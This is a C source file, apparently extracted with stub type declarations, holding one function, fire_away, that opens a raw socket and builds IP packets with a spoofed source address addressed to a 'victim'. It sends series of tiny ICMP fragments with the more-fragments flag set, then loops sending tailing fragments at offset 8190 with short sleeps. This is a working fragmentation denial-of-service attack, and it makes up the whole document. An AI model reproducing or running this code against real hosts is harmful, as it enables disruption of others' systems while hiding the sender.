
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_6__ TYPE_3__ ;
typedef struct TYPE_5__ TYPE_2__ ;
typedef struct TYPE_4__ TYPE_1__ ;


struct utsname {int dummy; } ;
struct TYPE_4__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; } ;
struct sockaddr {int dummy; } ;
struct passwd {int dummy; } ;
struct iphdr {int version; int ihl; int ttl; int protocol; unsigned long saddr; void* frag_off; void* id; int check; int daddr; void* tot_len; } ;
struct igmphdr {int dummy; } ;
struct TYPE_5__ {int id; int sequence; } ;
struct TYPE_6__ {TYPE_2__ echo; } ;
struct icmphdr {int checksum; TYPE_3__ un; scalar_t__ code; int type; } ;


 int AF_INET ;
 int ICMP_ECHO ;
 int IPPROTO_RAW ;
 unsigned long IP_MF ;
 int NUM_PACKETS ;
 int SOCK_RAW ;
 scalar_t__ calloc (int,int) ;
 int close (int) ;
 int free (unsigned char*) ;
 void* htons (int) ;
 int in_cksum (unsigned short*,int) ;
 int perror (char*) ;
 int printf (char*) ;
 int random () ;
 int sendto (int,unsigned char*,int,int ,struct sockaddr*,int) ;
 int socket (int ,int ,int ) ;
 int usleep (int) ;

int fire_away(struct sockaddr_in *victim, unsigned long src)
{
        int SMALLICMP = 1;
        unsigned char *pkt;
        struct iphdr *ip;
        struct igmphdr *igmp;
 struct icmphdr *icmp_pkt;
        struct utsname *un;
        struct passwd *p;
 int idList[NUM_PACKETS];
 unsigned long j;
        int i, s;
 int id = (random() % 40000) + 500;
 for (i=0;i<NUM_PACKETS;i++)
   idList[i]=(random() % 40000) + 500;



        pkt = (unsigned char *)calloc(1, SMALLICMP
          + sizeof(struct iphdr) +
          sizeof(struct icmphdr));
        ip = (struct iphdr *)pkt;
  icmp_pkt = (struct icmphdr *)(pkt + sizeof(struct iphdr));
        ip->version = 4;
        ip->ihl = (sizeof *ip) / 4;
        ip->ttl = 255;
        ip->tot_len = htons(SMALLICMP);
        ip->protocol = 1;
        ip->id = htons(id);
        ip->frag_off = htons(IP_MF);
        ip->saddr = src;
        ip->daddr = victim->sin_addr.s_addr;
        ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));


 icmp_pkt->type = ICMP_ECHO;
 icmp_pkt->code = 0;
 icmp_pkt->checksum = 1000;
 icmp_pkt->un.echo.id = random() % 255;
 icmp_pkt->un.echo.sequence = random() % 255;

        for(i = sizeof(struct iphdr) + sizeof(struct icmphdr) + 1;
            i < SMALLICMP; i++){
   pkt[i] = random() % 255;

 }

        if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
                perror("error: socket()");
                return 1;
        }

 printf(" Sending out series of small fragments\r\n");

 for(i=0;i<NUM_PACKETS;i++){
   ip->id = htons(idList[i]);
   for (j=0; j<8170; j += SMALLICMP + 1){
     ip->frag_off = htons(j | IP_MF);
     if(sendto(s, pkt,
        SMALLICMP + sizeof(struct iphdr),
        0, (struct sockaddr *)victim,
        sizeof(struct sockaddr_in)) == -1) {
       perror("error: sendto()");
       return 1;
     }
   }
 }

 printf(" Sending out tailing fragments\r\n");



 for (j=0;j<9999*NUM_PACKETS;j++){
   for(i=0;i<NUM_PACKETS;i++){
     ip->id=htons(idList[i]);
     ip->frag_off = htons(8190|IP_MF);

     sendto(s, pkt, sizeof(struct iphdr) + SMALLICMP,
     0, (struct sockaddr *)victim,
     sizeof(struct sockaddr_in));



   }
   usleep(100);
 }
        free(pkt);
        close(s);
        return 0;
}
